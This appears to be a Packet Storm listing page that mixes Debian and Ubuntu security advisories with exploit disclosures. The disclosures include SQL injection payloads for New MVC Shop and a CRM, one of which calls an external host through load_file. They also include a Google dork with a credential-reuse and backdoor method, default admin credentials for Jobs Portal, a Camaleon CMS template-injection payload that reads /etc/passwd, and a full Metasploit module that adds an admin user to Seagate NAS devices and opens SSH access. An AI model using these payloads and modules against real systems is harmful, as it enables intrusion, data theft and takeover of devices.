Debian Linux Security Advisory 5412-1 - Several vulnerabilities were discovered in libraw, a library for reading RAW files obtained from digital photo cameras, which may result in denial of service or the execution of arbitrary code if specially crafted files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5412-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoMay 27, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : librawCVE ID         : CVE-2021-32142 CVE-2023-1729Debian Bug     : 1031790 1036281Several vulnerabilities were discovered in libraw, a library for readingRAW files obtained from digital photo cameras, which may result indenial of service or the execution of arbitrary code if speciallycrafted files are processed.For the stable distribution (bullseye), these problems have been fixed inversion 0.20.2-1+deb11u1.We recommend that you upgrade your libraw packages.For the detailed security status of libraw please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/librawFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmRyXNFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0S6ehAAlIVUex5cV2eOg9y4Z4MrXPPEl7DPhsEItBnU6tA0PQLxImblhRY2+bruFw7S3ovXQxOJQRW3CQ7ykRenfERuZXvENJwbauwD4XFAFPOHcs0lEkdAumQ4pEnxczetY/GXvXVqZ5L2LD8SDLrPLO37u5JNZGclVHn+2OkzSPm3rMwvXXPy0uik6PG1dlJBTbAeTm8bCls+TEvcCD3M1EgwqcJ4Cemnd43R4BvLsd8FJWWB41XrbvEtt5s644k3eJ19EkjYJ/lfi2Uu2b6m1crdFt1DSFl1UlGaMWL/Jz+R8OzAYenlY7RRXzZOsMSPlt4B4TUC1AG0WgeZhec4StNDhdQyNZ4ild/2yUqR0cdMLWIHs1Lst+Yr4sKO4BAe75otA93nV49bicwgA+8Sb4nehLZAIm+dUbc+6SmqwntHsfZpSyWTt4FuAH6dM8R6hOAXkQ7DI9x9eod1NLH0FXqcl61qAKrfs348Rd4vPZY5TCndxvSJDuyynDFs9GrYKgN0mN/2ePAgj2Y7CvfUnkoVwK9AeQRETkSLzTwivT+XBc2RUaYRohGARp7DXnoEhtvLUx1Efr1LKXNizT958kpBPvTp3fVf6iP/fW9VtZudbvQb2wBrF7iDe/r4PX2OoYXdbm5qiV7wU20M+YQwZqIva95FQkKxdtPfnYzAWpWMa8g¿zv-----END PGP SIGNATURE-----

Debian Security Advisory 5412-1

Debian Linux Security Advisory 5414-1 - Jose Gomez discovered that the Catalog API endpoint in the Docker registry implementation did not sufficiently enforce limits, which could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5414-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 27, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : docker-registryCVE ID         : CVE-2023-2253Debian Bug     : 1035956Jose Gomez discovered that the Catalog API endpoint in the Dockerregistry implementation did not sufficiently enforce limits, whichcould result in denial of service.For the stable distribution (bullseye), this problem has been fixed inversion 2.7.1+ds2-7+deb11u1.We recommend that you upgrade your docker-registry packages.For the detailed security status of docker-registry please refer toits security tracker page at:https://security-tracker.debian.org/tracker/docker-registryFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRx4msACgkQEMKTtsN8TjZ7fw/9E+dbZBJfuAwWXfAdwAuSE+6aN2Ddqb956wFeT0K+sMaEzhnDthATuJx0cR8K9TfVOcSUbn7bhi/fDxlWMoUL+wN14MxwphZ2udEAgkv052bz97/vAU2bcGNuye081BQWgbdpxm4Y5ioVSyze0y9uixKkBA6grnc9DQoEZz/4cqifxJh5itwFi/AC5TuNzZk4HY7kDrRf/OLZZpZFNloNP9G535FxEdmjR3jTd6scSbEnwmXmuUPUQwo6IfrCLnPRVXY0Vn2Pphb8fK1vsYZrWQpzvBHr4UO/z8F14Pl1AVqQNh0Oct5y/oDhY4MN8n9e5Zsx4lunBczhOS8fGy0gU2ZLK12KTLeTdA1TSZMV6MrkFdYAiWDI6+qP7f8LQi4m1h2HqJX9nm50eEjZ4lfwtK0Xwb0YQEkadpnknbdQM1zkojblFZOjQqq8GQwQQYD+XfIRThZWLz3vA9RhE1MH0/p5JNxfQmm2VG7xdtBdWV5PRtnUtC9KoYQ4wyJjE4AxRbbVbVGoyuoQOCEmMt+MYp68aYjHQD6szT9aGNpyxKdncjHVAVQGdb4cYPAi3m0uObQKsy0q6tDXu+8BhZDoFaFlyy9AtFjPL0mE36FTiLxOmkkJ0Xi4fNlu4Ghq2yiX/lK+xuXjQ+D7SVu6KEuKg8p7ATxIh5k2AmSh6bO7Gz8=vOWz-----END PGP SIGNATURE-----

Debian Security Advisory 5414-1

New MVC Shop version 1.0 suffers from remote SQL injection and missing attribute vulnerabilities.

    ## Title: new-mvc-shop-1.0 - SQLi + SameSite attribute weak securityPHPSESSID Hijacking## Author: nu11secur1ty## Date: 05.29.2023## Vendor: https://chikoiquan.tanhongit.com/## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0## Reference: https://portswigger.net/web-security/sql-injection## Description:The `User-Agent` HTTP header appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\ttq1xmuilflmnv0pcl7cjdwb42avymmdp1koacz.pedal.com\\iqp'))+'was submitted in the User-Agent HTTP header. This payload injects aSQL sub-query that calls MySQL's load_file function with a UNC filepath that references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can retrieve all information from thedatabase of this system.---------------------------------------------------------------------------------------------------------------The following cookie was issued by the application and does not havethe secure flag set:PHPSESSID: The cookie appears to contain a session token, which mayincrease the risk associated with this issue.The malicious user can use one PHPSESSID to connect multiple times onthe system using the same account session.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: User-Agent (User-Agent)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8)Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)' AND (SELECT2825 FROM (SELECT(SLEEP(15)))VKYP)-- kuoe---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/new-mvc-shop-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/new-mvc-shop-10-sqli-samesite-attribute.html)## Time spend:00:35:00

New MVC Shop 1.0 SQL Injection / Missing Attributes

Simple Customer Relationship Management CRM 2023 version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: SCRMS-2023-05-27-1.0-Multiple-SQLi## Author: nu11secur1ty## Date: 05.27.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `email` parameter appears to be vulnerable to SQL injectionattacks. The test payloads 45141002' or 6429=6429-- and 37491017' or5206=5213-- were each submitted in the email parameter. These tworequests resulted in different responses, indicating that the input isbeing incorporated into a SQL query in an unsafe way. The attacker caneasily steal all users and their passwords for access to the system.Even if they are strongly encrypted this will get some time, but thisis not a problem for an attacker to decrypt if, if they are not enoughstrongly encrypted.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: email (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html)## Time spend:01:00:00

Simple Customer Relationship Management CRM 2023 1.0 SQL Injection

It appears that sites designed by e-Biz Technocrats Pvt.Ltd suffer from a remote SQL injection vulnerability. As they do not provide any sort of versioning with their offerings, the researcher was unable to provide affected versions. Versions as of May 11, 2023 were affected.

    # Exploit Title: Sql Injection on one site credentials can be use on other sites- Google Dork:" Designed and Developed by e-Biz Technocrats Pvt.Ltd "- Date: 05/11/2023- Exploit Author: K1LL3rB4LL- Tested on: Mac, Windows, LinuxDescription:The vulnerability found is an SQL injection. You may run the site thru automated sql injection or manually doing sql injection once the credentials gathered you do your reverse ip to check your other website.Vuln colum count: 5Vuln colum : 3,4Type of Sql : WAFUsername: adminPassword: 123456admin panel: site.com/adminDetails: After gathering information from sql injection from site a site (site A) you may use the said credentials to access other websites on the same ip or with the same developer if you managed to get an access and upload a php script or backdoor. You may access other sites on their public_html or that is connected on their website which share the same server and if your going to look at the sites they share the same common developer. In some sites that don't have the same credentials you still do the same sql injection with the same colum count, vuln colum number and database where they store the admin credentials.

e-Biz Technocrats Pvt.Ltd SQL Injection

Jobs Portal version 3.6 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Jobs Portal V 3.6 Insecure Settings Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://codecanyon.net/item/jobs-portal-job-board-laravel-script/22607607                                          |  | # Dork      : "Our partners make Milestone products more dynamic "                                                               |                "Vestibulum vel nibh et erat faucibus Category : Jobseekers, General"                                              |                "Design by: eCreativeSolutions"                                                                                    |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=buyer@buyer.com & pass=buyer123456 [+] https://localhost.com/admin/edit-site-settingGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Jobs Portal 3.6 Insecure Settings

Camaleon CMS version 2.7.0 suffers from a server-side template injection vulnerability.

Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)  
Exploit Author: PARAG BAGUL  
CVE: CVE-2023-30145

## Description  
Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template  
Injection (SSTI) vulnerability via the formats parameter.

## Affected Component  
All versions below 2.7.0 are affected.

## Author  
Parag Bagul

## Steps to Reproduce  
1. Open the target URL: `https://target.com/admin/media/upload`  
2. Upload any file and intercept the request.  
3. In the `formats` parameter value, add the payload `test<%= 7*7 %>test`.  
4. Check the response. It should return the multiplication of 77 with the  
message "File format not allowed (dqopi49vuuvm)".

##Detection:

#Request:

POST /admin/media/upload?actions=false HTTP/1.1  
Host: target.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101  
Firefox/102.0  
Accept: /  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://target.com/admin/profile/edit  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------327175120238370517612522354688  
Content-Length: 1200  
Origin: http://target.com  
DNT: 1  
Connection: close  
Cookie: cookie

-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="file_upload"; filename="test.txt"  
Content-Type: text/plain

test

-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="versions"

-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="thumb_size"

-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="formats"

test<%= 7*7 %>test  
-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="media_formats"

image  
-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="dimension"

-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="private"

-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="folder"

/  
-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="skip_auto_crop"

true  
-----------------------------327175120238370517612522354688--

#Response:

HTTP/1.1 200 OK  
Content-Type: text/html; charset=utf-8  
Connection: close  
Status: 200 OK  
Cache-Control: max-age=0, private, must-revalidate  
Set-Cookie: cookie  
Content-Length: 41

File format not allowed (test49test)

#Exploitation:

To execute a command, add the following payload:  
testqopi<%= File.open('/etc/passwd').read %>fdtest

Request:

POST /admin/media/upload?actions=true HTTP/1.1  
Host: target.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101  
Firefox/102.0  
Accept: /  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://target.com/admin/media  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------104219633614133026962934729021  
Content-Length: 1237  
Origin: http://target.com  
DNT: 1  
Connection: close  
Cookie: cookie

-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="file_upload"; filename="test.txt"  
Content-Type: text/plain

test

-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="versions"

-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="thumb_size"

-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="formats"

dqopi<%= File.open('/etc/passwd').read %>fdfdsf  
-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="media_formats"

-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="dimension"

-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="private"

-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="folder"

/  
-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="skip_auto_crop"

true  
-----------------------------104219633614133026962934729021--

Response:

Response:

HTTP/1.1 200 OK  
Content-Type: text/html; charset=utf-8  
Connection: close  
Status: 200 OK  
Set-Cookie: cookie  
Content-Length: 1816

File format not allowed (dqopiroot:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
sys:x:3:3:sys:/dev:/usr/sbin/nologin  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/usr/sbin/nologin  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
fdfdsf)

Camaleon CMS 2.7.0 Server-Side Template Injection

Debian Linux Security Advisory 5411-1 - Multiple issues were found in GPAC multimedia framework, which could result in denial of service or potentially the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5411-1                   security@debian.org  
https://www.debian.org/security/                                  Aron Xu  
May 26, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : gpac  
CVE ID         : CVE-2020-35980 CVE-2021-4043 CVE-2021-21852 CVE-2021-33361   
                 CVE-2021-33363 CVE-2021-33364 CVE-2021-33365 CVE-2021-33366   
                 CVE-2021-36412 CVE-2021-36414 CVE-2021-36417 CVE-2021-40559   
                 CVE-2021-40562 CVE-2021-40563 CVE-2021-40564 CVE-2021-40565   
                 CVE-2021-40566 CVE-2021-40567 CVE-2021-40568 CVE-2021-40569   
                 CVE-2021-40570 CVE-2021-40571 CVE-2021-40572 CVE-2021-40574   
                 CVE-2021-40575 CVE-2021-40576 CVE-2021-40592 CVE-2021-40606   
                 CVE-2021-40608 CVE-2021-40609 CVE-2021-40944 CVE-2021-41456   
                 CVE-2021-41457 CVE-2021-41459 CVE-2021-45262 CVE-2021-45263   
                 CVE-2021-45267 CVE-2021-45291 CVE-2021-45292 CVE-2021-45297   
                 CVE-2021-45760 CVE-2021-45762 CVE-2021-45763 CVE-2021-45764   
                 CVE-2021-45767 CVE-2021-45831 CVE-2021-46038 CVE-2021-46039   
                 CVE-2021-46040 CVE-2021-46041 CVE-2021-46042 CVE-2021-46043   
                 CVE-2021-46044 CVE-2021-46045 CVE-2021-46046 CVE-2021-46047   
                 CVE-2021-46049 CVE-2021-46051 CVE-2022-1035 CVE-2022-1222   
                 CVE-2022-1441 CVE-2022-1795 CVE-2022-2454 CVE-2022-3222   
                 CVE-2022-3957 CVE-2022-4202 CVE-2022-24574 CVE-2022-24577   
                 CVE-2022-24578 CVE-2022-26967 CVE-2022-27145 CVE-2022-27147   
                 CVE-2022-29537 CVE-2022-36190 CVE-2022-36191 CVE-2022-38530   
                 CVE-2022-43255 CVE-2022-45202 CVE-2022-45283 CVE-2022-45343   
                 CVE-2022-47086 CVE-2022-47091 CVE-2022-47094 CVE-2022-47095   
                 CVE-2022-47657 CVE-2022-47659 CVE-2022-47660 CVE-2022-47661   
                 CVE-2022-47662 CVE-2022-47663 CVE-2023-0770 CVE-2023-0818   
                 CVE-2023-0819 CVE-2023-0866 CVE-2023-1448 CVE-2023-1449   
                 CVE-2023-1452 CVE-2023-1654 CVE-2023-2837 CVE-2023-2838   
                 CVE-2023-2839 CVE-2023-2840 CVE-2023-23143 CVE-2023-23144   
                 CVE-2023-23145

Multiple issues were found in GPAC multimedia framework, whcih could result  
in denial of service or potentially the execution of arbitrary code.

For the stable distribution (bullseye), these problems have been fixed in  
version 1.0.1+dfsg1-4+deb11u2.

We recommend that you upgrade your gpac packages.

For the detailed security status of gpac please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/gpac

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmRwutMACgkQO1LKKgqv  
2VQhxgf/aXBHEqvI+O12zLVGiSFBgAgP0WpynhRv+ESync2+EFNBpF/1/w0CAhVr  
mn3NWsUxj21u4Pm9YjfvG7+YXaDTaEqkrgwVknvZKwV6KY42mSEvztWfqTk5xEe1  
Hi7MUL+xKIjUblcgFxNSEAZkb/u9XO3KE7XbPKqNE+FZtz+K95Vtq7CGx+jvpa/F  
Q+e286fsay38RYsI+ESqxe8N5WYljiIph/thot/uawV6vSNYqR1te4wzn//AkDvL  
ADq4Hsr3yQSpDbPEToJwS+Q/Gd4YH7IsqtdSMWdtnrxC6Ri4zSrq+AlOvPe7xM35  
aIUZuLxhqlp6rmBBhNYefgqTiX1vdg==  
=faP5  
-----END PGP SIGNATURE-----

Debian Security Advisory 5411-1

Ubuntu Security Notice 6109-1 - Zheng Wang discovered that the Intel i915 graphics driver in the Linux kernel did not properly handle certain error conditions, leading to a double-free. A local attacker could possibly use this to cause a denial of service. Jordy Zomer and Alexandra Sandulescu discovered that the Linux kernel did not properly implement speculative execution barriers in usercopy functions in certain situations. A local attacker could use this to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6109-1  
May 25, 2023

linux-raspi, linux-raspi-5.4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-raspi: Linux kernel for Raspberry Pi systems  
- linux-raspi-5.4: Linux kernel for Raspberry Pi systems

Details:

Zheng Wang discovered that the Intel i915 graphics driver in the Linux  
kernel did not properly handle certain error conditions, leading to a  
double-free. A local attacker could possibly use this to cause a denial of  
service (system crash). (CVE-2022-3707)

Jordy Zomer and Alexandra Sandulescu discovered that the Linux kernel did  
not properly implement speculative execution barriers in usercopy functions  
in certain situations. A local attacker could use this to expose sensitive  
information (kernel memory). (CVE-2023-0459)

It was discovered that the TLS subsystem in the Linux kernel contained a  
type confusion vulnerability in some situations. A local attacker could use  
this to cause a denial of service (system crash) or possibly expose  
sensitive information. (CVE-2023-1075)

It was discovered that the Reliable Datagram Sockets (RDS) protocol  
implementation in the Linux kernel contained a type confusion vulnerability  
in some situations. An attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1078)

Xingyuan Mo discovered that the x86 KVM implementation in the Linux kernel  
did not properly initialize some data structures. A local attacker could  
use this to expose sensitive information (kernel memory). (CVE-2023-1513)

It was discovered that a use-after-free vulnerability existed in the iSCSI  
TCP implementation in the Linux kernel. A local attacker could possibly use  
this to cause a denial of service (system crash). (CVE-2023-2162)

It was discovered that the NET/ROM protocol implementation in the Linux  
kernel contained a race condition in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-32269)

Duoming Zhou discovered that a race condition existed in the infrared  
receiver/transceiver driver in the Linux kernel, leading to a use-after-  
free vulnerability. A privileged attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1118)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1085-raspi    5.4.0-1085.96  
   linux-image-raspi               5.4.0.1085.115  
   linux-image-raspi2              5.4.0.1085.115

Ubuntu 18.04 LTS:  
   linux-image-5.4.0-1085-raspi    5.4.0-1085.96~18.04.1  
   linux-image-raspi-hwe-18.04     5.4.0.1085.82

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6109-1  
   CVE-2022-3707, CVE-2023-0459, CVE-2023-1075, CVE-2023-1078,  
   CVE-2023-1118, CVE-2023-1513, CVE-2023-2162, CVE-2023-32269

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1085.96  
   https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1085.96~18.04.1

Ubuntu Security Notice USN-6109-1

This Metasploit module exploits the broken access control vulnerability in Seagate Central External NAS Storage device. Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state and register a new admin user which is capable of SSH access.

    ### Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)# Date: Dec 9 2019# Exploit Author: Ege Balci# Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/# Version: 2015.0916# CVE : 2020-6627# This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'net/http'require 'net/ssh'require 'net/ssh/command_stream'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::SSH  def initialize(info={})    super(update_info(info,      'Name'           => "Seagate Central External NAS Arbitrary User Creation",      'Description'    => %q{        This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.        Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state        and register a new admin user which is capable of SSH access.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Ege Balcı <egebalci@pm.me>' # author & msf module        ],      'References'     =>        [          ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'],          ['CVE', '2020-6627']        ],      'DefaultOptions'  =>        {          'SSL' => false,          'WfsDelay' => 5,        },      'Platform'       => ['unix'],      'Arch'           => [ARCH_CMD],      'Payload'        =>      {        'Compat' => {          'PayloadType'    => 'cmd_interact',          'ConnectionType' => 'find'        }      },      'Targets'        =>        [          ['Auto',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD            }          ],        ],      'Privileged'     => true,      'DisclosureDate' => "Dec 9 2019",      'DefaultTarget'  => 0    ))    register_options(      [        OptString.new('USER', [ true, 'Seagate Central SSH user', '']),        OptString.new('PASS', [ true, 'Seagate Central SSH user password', ''])      ], self.class    )    register_advanced_options(      [        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])      ]    )  end  def check    res = send_request_cgi({      'method'    => 'GET',      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"),      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      }    },60)    if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916')      Exploit::CheckCode::Appears    else      Exploit::CheckCode::Safe    end  end  def exploit    # First get current state    first_state=get_state()    if first_state      print_status("Current device state: #{first_state['state']}")    else      return    end    if first_state['state'] != 'start'      # Set new start state      first_state['state'] = 'start'      res = send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'),        'ctype' => 'application/x-www-form-urlencoded',        'data'  => "info=#{first_state.to_json}"      },60)      changed_state=get_state()      if changed_state && changed_state['state'] == 'start'        print_good("State successfully changed !")      else        print_error("Could not change device state")        return      end    end    name = Rex::Text.rand_name_male    user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}"    pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8)    print_status('Creating new admin user...')    print_status("User: #{user}")    print_status("Pass: #{pass}")    # Add new admin user    res = send_request_cgi({      'method'    => 'POST',      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"),      'ctype' => 'application/x-www-form-urlencoded',      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1}    },60)    conn = do_login(user,pass)    if conn      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")      handler(conn.lsock)    end  end  def do_login(user, pass)    factory = ssh_socket_factory    opts = {      :auth_methods    => ['password', 'keyboard-interactive'],      :port            => 22,      :use_agent       => false,      :config          => false,      :password        => pass,      :proxy           => factory,      :non_interactive => true,      :verify_host_key => :never    }    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']    begin      ssh = nil      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do        ssh = Net::SSH.start(rhost, user, opts)      end    rescue Rex::ConnectionError      fail_with Failure::Unreachable, 'Connection failed'    rescue Net::SSH::Disconnect, ::EOFError      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"      return    rescue ::Timeout::Error      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"      return    rescue Net::SSH::AuthenticationFailed      print_error "#{rhost}:#{rport} SSH - Failed authentication"    rescue Net::SSH::Exception => e      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"      return    end    if ssh      conn = Net::SSH::CommandStream.new(ssh)      ssh = nil      return conn    end    return nil  end  def get_state    res = send_request_cgi({      'method'    => 'GET',      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"),      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      }    },60)    if res && (res.code == 200 ||res.code == 100)      return res.get_json_document    end    res = nil  endend

Source

Packet Storm